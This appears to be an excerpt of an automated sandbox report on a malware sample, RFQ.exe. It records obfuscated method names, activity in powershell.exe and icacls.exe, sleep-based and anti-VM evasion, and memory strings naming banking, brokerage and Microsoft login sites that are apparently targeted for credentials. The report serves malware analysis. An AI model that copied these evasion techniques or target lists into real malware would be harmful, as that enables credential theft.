            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, tX7h0O8HPDhXVPIY0I.csHigh entropy of concatenated method names: 'SLymVuZ77B', 'cgWm1PxWFO', 'A5wmvyk6My', 'UqnmIt0BBW', 'GvwmuWisaV', 'mAdmQFUIc9', 'BDEmKJghi7', 'gHpmPuYPys', 'MgtmW4bYWD', 'BRRmFLa3hr'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, j0dSf8SbSE5jx3q18CX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XGyFwbNSUN', 'pE6FiisZ6u', 'FSVFgodRhe', 'ImVFklsPKh', 'gS7F63k2Pf', 'L24FNlBKfL', 'sI5F8PH8Zu'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, LJJIfvh4QonUqcUNLk.csHigh entropy of concatenated method names: 'xwx5ZHbnvG', 'VTS5JYZUOn', 'lV35o68GFn', 'ujE5HZKbby', 'PTX5uohUBk', 'Wel5QnGJLO', 'JDLiStZDk5TgRSb1LT', 'BLXWK4gkbd0yf89fVH', 'X2h556h6kn', 'dcI5S1oyZA'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, im0shl6YDE6ewhk7cM.csHigh entropy of concatenated method names: 'blFuBcgqkc', 'ft8uGEoOBe', 'N7ZuwyprWw', 'vT7uiEaUbv', 'nRQuLqPFXt', 'QOtud3oTJu', 'jL5ujf5TyN', 'fwbunnWQBr', 'KYVu269AIb', 'skhusaQ6fG'

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: RFQ.exe PID: 4464, type: MEMORYSTR
            Source: C:\Users\user\Desktop\RFQ.exeMemory allocated: 1200000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeMemory allocated: 4BD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A7096E rdtsc 5_2_01A7096E
            Source: C:\Users\user\Desktop\RFQ.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6642Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3165Jump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeWindow / User API: threadDelayed 4388Jump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeWindow / User API: threadDelayed 5585Jump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\icacls.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\RFQ.exe TID: 2920Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exe TID: 2272Thread sleep count: 4388 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\icacls.exe TID: 2272Thread sleep time: -8776000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exe TID: 2272Thread sleep count: 5585 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\icacls.exe TID: 2272Thread sleep time: -11170000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe TID: 6688Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe TID: 6688Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe TID: 6688Thread sleep time: -54000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe TID: 6688Thread sleep count: 40 > 30Jump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe TID: 6688Thread sleep time: -40000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\icacls.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030DB130 FindFirstFileW,FindNextFileW,FindClose,8_2_030DB130
            Source: C:\Users\user\Desktop\RFQ.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: dvvZj3l0.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: dvvZj3l0.8.drBinary or memory string: discord.comVMware20,11696428655f
            Source: dvvZj3l0.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: dvvZj3l0.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: dvvZj3l0.8.drBinary or memory string: global block list test formVMware20,11696428655
            Source: dvvZj3l0.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: dvvZj3l0.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: dvvZj3l0.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: dvvZj3l0.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431610588.0000000000E2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
            Source: dvvZj3l0.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: dvvZj3l0.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: dvvZj3l0.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: dvvZj3l0.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: dvvZj3l0.8.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: dvvZj3l0.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: icacls.exe, 00000008.00000002.4431220100.00000000032A1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2440568776.000001853651D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: dvvZj3l0.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: dvvZj3l0.8.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: dvvZj3l0.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: dvvZj3l0.8.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: dvvZj3l0.8.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: dvvZj3l0.8.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: dvvZj3l0.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: dvvZj3l0.8.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: dvvZj3l0.8.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: dvvZj3l0.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: dvvZj3l0.8.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: dvvZj3l0.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
